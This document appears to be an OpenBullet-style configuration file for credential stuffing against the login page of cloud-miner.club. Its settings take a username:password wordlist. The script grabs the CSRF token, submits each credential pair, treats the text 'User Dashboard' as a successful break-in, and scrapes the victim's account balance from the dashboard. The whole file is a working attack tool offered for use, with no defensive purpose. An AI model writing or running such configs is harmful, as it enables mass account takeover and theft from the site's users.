[SETTINGS]
{
  "Name": "cloud-miner.club",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-29T04:20:39.2859683+02:00",
  "AdditionalInfo": "",
  "Author": "r37z",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://cloud-miner.club/login" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "origin: https://cloud-miner.club" 
  HEADER "referer: https://cloud-miner.club/login" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"_token\" value=\"" "\">" -> VAR "t" 

REQUEST POST "https://cloud-miner.club/login" 
  CONTENT "_token=<t>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "User Dashboard" 
  KEYCHAIN Failure OR 
    KEY "These credentials do not match our records." 

PARSE "<SOURCE>" LR "<div class=\"huge dashboard-balance-text\"> $ <span data-counter=\"counterup\" data-value=\"0\">" "</span></div>" -> CAP "balance" "$ " "" 

